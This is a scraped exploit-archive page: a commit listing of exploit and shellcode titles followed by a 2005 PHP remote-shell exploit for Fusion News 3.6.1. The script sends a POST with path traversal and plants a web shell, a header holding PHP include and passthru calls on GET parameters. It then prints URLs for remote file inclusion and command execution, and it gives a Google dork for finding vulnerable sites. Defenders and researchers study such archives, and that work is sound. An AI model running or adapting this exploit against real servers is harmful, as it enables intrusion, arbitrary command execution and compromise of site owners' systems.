880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
87 lines
No EOL
2.8 KiB
PHP
87 lines
No EOL
2.8 KiB
PHP
source: https://www.securityfocus.com/bid/13661/info
|
|
|
|
FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This may facilitate unauthorized access.
|
|
|
|
<?
|
|
$copyr = "
|
|
!!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!!
|
|
|
|
oooo...oooo.oooooooo8.ooooooooooo
|
|
.8888o..88.888........88..888..88
|
|
.88.888o88..888oooooo.....888
|
|
.88...8888.........888....888
|
|
o88o....88.o88oooo888....o888o
|
|
********************************
|
|
**** Network security team *****
|
|
********* nst.void.ru **********
|
|
********************************
|
|
* Title: Fusion News v3.6.1
|
|
* Date: 15.05.2005
|
|
********************************
|
|
|
|
Remote shell exploit.
|
|
|
|
Google:
|
|
allintitle:f u s i o n : n e w s : m a n a g e m e n t : s y s t e m
|
|
|
|
Script owner: www.fusionphp.net
|
|
|
|
*** Exploit contains anti-script kidis trick. ***
|
|
Count: 4
|
|
|
|
Greetz to: GHC, RST, LWB, AntiChat, VOID, Web-Hack, Securitylab, Security.nnov, Securityfocus
|
|
|
|
Visit all our friends:
|
|
Rus:
|
|
ghc.ru
|
|
rst.void.ru
|
|
lwb57.org
|
|
antichat.ru
|
|
void.ru
|
|
web-hack.ru
|
|
securitylab.ru
|
|
security.nnov.ru
|
|
Eng:
|
|
securityfocus.com
|
|
|
|
Greentz to Ch0k37 from gh0sts, which wants to purchase this exploit but he was too greedy.
|
|
|
|
!!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!! PRIVATE !!!
|
|
|
|
*** Public: 17.05.2005 ***
|
|
";
|
|
|
|
# CONFIG (example: http://www.site.com/news/)
|
|
$host = "www.site.com"; # address - example: www.site.com
|
|
$folder = "folder/to/fusion"; # folder - example: news
|
|
# END OF CONFIG
|
|
|
|
|
|
$fp = fsockopen($host, 80);
|
|
$data = "name=nst&email=&fullnews=nst&chars=297&com_Submit=Submit&pass=";
|
|
$out = "POST /$folder/comments.php?mid=post&id=/../../templates/headline_temp HTTP/1.1\r\n";
|
|
$out.= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*\r\n";
|
|
$out.= "Referer: http://$host/\r\n";
|
|
$out.= "Accept-Language: ru\r\n";
|
|
$out.= "X-FORWORDEDFOR: <?@include($_GET[nst_inc]);@passthru($_GET[nst_cmd]);?>\r\n";
|
|
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
|
|
$out.= "Accept-Encoding: gzip, deflate\r\n";
|
|
$out.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n";
|
|
$out.= "Host: $hots\r\n";
|
|
$out.= "Content-Length: 64\r\n";
|
|
$out.= "Connection: Keep-Alive\r\n";
|
|
$out.= "Cache-Control: no-cache\r\n";
|
|
$out.= "\r\n";
|
|
$out.= "name=test&email=&fullnews=test&chars=297&com_Submit=Submit&pass=";
|
|
fputs($fp,$out);
|
|
while(!feof($fp)){
|
|
fgets($fp, 128);
|
|
}
|
|
print "<pre>";
|
|
print $copyr;
|
|
print "\r\n\r\n <b>
|
|
Result:
|
|
|
|
http://$host/$folder/templates/headline_temp.php?nst_inc=http://YOUR_FILE \r\n";
|
|
print "http://$host/$folder/templates/headline_temp.php?nst_cmd=ls -la";
|
|
?>
|